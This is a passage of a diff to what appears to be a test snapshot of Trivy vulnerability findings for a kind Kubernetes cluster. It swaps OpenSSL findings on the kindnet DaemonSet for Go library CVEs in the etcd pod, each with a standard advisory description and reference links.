"https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", + ], + }, + "category": "Vulnerability", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "faccessat checks wrong group", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", + ], + }, + "category": "Vulnerability", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://groups.google.com/g/golang-announce", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", + ], + }, + "category": "Vulnerability", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "crash in a golang.org/x/crypto/ssh server", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": 